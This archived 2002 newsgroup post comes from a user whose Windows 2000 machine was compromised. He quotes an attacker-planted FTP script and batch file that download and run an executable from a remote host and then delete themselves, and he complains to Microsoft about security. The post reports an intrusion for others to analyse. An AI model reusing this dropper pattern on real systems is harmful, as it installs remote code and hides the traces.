Is it really true that NTFS is secure?

From: George Hester (hesterloli@hotmail.com)
Date: 12/12/02

From: "George Hester" <hesterloli@hotmail.com>
Date: Thu, 12 Dec 2002 10:42:51 -0500

'--------- File: s.t sitting in %SystemRoot%\system32 ->
open #my.ip.address# 'chnaged ip for privacy
binary
recv sui.exe .\sui.exe
quit
/-------- End of s.t

REM File r.bat sitting in %SystemRoot%\system32 -->
ftp -vnAs:s.t
del s.t
sui.exe -s678p345 -o
call g.bat
del r.bat
REM End of r.bat --------

Windows 2000 Professional SP3 IIS Updated OEX SP1 "Fixed" IE 6 SP1 NTFS File system

I think not.

Microsoft your promise of addressing Security I'm not at all happy with it. The Criminals on the Net are showing you up. They are getting the upper hand on you. And your silence in this matter speaks louder then your willy-nilly ideas of what to do about it.

If you really want to do something about security analyze this.

I am not at all happy with you in this regard.

--
George Hester
__________________________________

Relevant Pages

  • RE: Multiple FTP Problems
    ... Subject: Multiple FTP Problems ... delete the file with IDCAMS or IEFBR14 ... the one with the "del" being without the (EXIT so that the RC ... For IBM-MAIN subscribe / signoff / archive access instructions, ...
    (bit.listserv.ibm-main)
  • Re: Multiple FTP Problems
    ... Subject: Multiple FTP Problems ... the one with the "del" being without the (EXIT so that the RC ... So you can't write JCL and you can't write a simple FTP program. ...
    (bit.listserv.ibm-main)
  • Re: FTP login move every 5mins
    ... > Im looking for a command I can enter to a bat file thats ... > sit on an FTP site and every 5min tranfer a file from FTP to an another ... if exist stopftp.flg del stopftp.flg ...
    (microsoft.public.win2000.cmdprompt.admin)
  • Re: Install options - hard drive
    ... > the source in addition to FTP. ... > Since I can't get the FTP install to work, ... Only thing to watch out for, I found, was downloading text as binary ... del 8-) ...
    (alt.os.linux.suse)